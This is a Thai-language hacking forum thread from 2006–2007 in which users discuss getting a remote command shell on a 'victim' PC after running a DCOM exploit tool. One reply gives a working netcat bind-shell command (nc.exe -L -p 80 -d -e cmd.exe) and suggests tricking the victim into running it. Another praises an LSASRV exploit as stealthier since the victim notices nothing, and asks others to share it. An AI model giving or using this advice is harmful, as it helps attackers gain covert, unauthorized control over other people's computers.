View Full Version : ทำไงให้ netcat ให้มันโยน cmd กลับมาครับ
naratipb
04-10-2006, 08:02 PM
ผมลองใช้ dcomexploit.exe ในเครื่องที่มีช่องโหว่แต่พอมันบอกให้ ใช้ netcat connect ที่ port 4444 ของเครื่องเป้าหมายพอ ใช้คำสั่งคือ nc xxx.xxx.xxx.xxx 4444 แล้วมันไม่ให้ cmd เครื่องเป้าหมายมา ต้องทำยังไงครับ
bomtelecom
22-06-2007, 03:45 PM
XP Sp1 Sp2 ก็ใช้ไม่ได้แล้วครับ ทาง microsoft ได้อุดช่องโหว่แล้ว
Karun
22-06-2007, 08:43 PM
งั้นเราก็เปลี่ยนครับ
ให้เหยื่อเปิดพอร์ตเลยครับ แล้วให้มันโยน CMD กลับมาแทน
โดยให้ที่เครื่องเหยื่อ ใช้ netcat แบบนี้ครับ (หาวิธีหลอกล่อหรือติดตั้งเอาเอง)
nc.exe -L -p 80 -d -e cmd.exe
-L คือให้ listen ที่พอร์ต -p 80 ตลอดเวลา (แอลตัวใหญ่)
ส่วน -d -e cmd.exe คือให้ redirect application ไปที่ cmd ครับผม
ลองไปใช้ดูนะครับ
Karun
22-06-2007, 10:53 PM
งั้นเราก็เปลี่ยนครับ
ให้เหยื่อเปิดพอร์ตเลยครับ แล้วให้มันโยน CMD กลับมาแทน
sonteen
26-06-2007, 11:24 AM
ผมว่าถ้าเราใช้ nc เปิด port อะไรซักอันอันทิ้งไว้รอการ connect จากเราแล้วเรา connect เข้าไปทาง port ที่เราเปิดไว้อะคับน่าจะได้ เคยทำบนลีนุก แต่วินโดว์ไม่เคย ว่าแต่ผมเข้าใจอะไรผิดป่าวเนี่ย
blshuta
20-09-2007, 07:28 PM
จริงๆก็มีโปรแกรมอีกตัวที่ชื่อ LSASRV_04011 ตัวนั้นก็ไว้เปิดช่องโหว่ของ lsasrv.dll แล้วค่อยให้มันรับportที่เราระบุไว้ แต่ตอนนี้ผมหาไม่ได้แระ ใครมีก็รบกวนลงให้ด้วยนะครับ^^
P$. ตัวนี้มันจาไม่เหมือนdcomก้คือ ถ้าเราใช้dcomเนี่ย เจ้าตัวจะรู้แน่ๆว่าโดนเจาะ เพราะคอมมันจาทำการรีเครื่องแบบบังคับอ้ะ แต่ถ้าใช้lsasrvมันจาเงียบๆไปเลย ไม่มีสิ่งผิดปกติอ่า^^
Powered by vBulletin® Version 4.2.5 Copyright © 2026 vBulletin Solutions Inc. All rights reserved.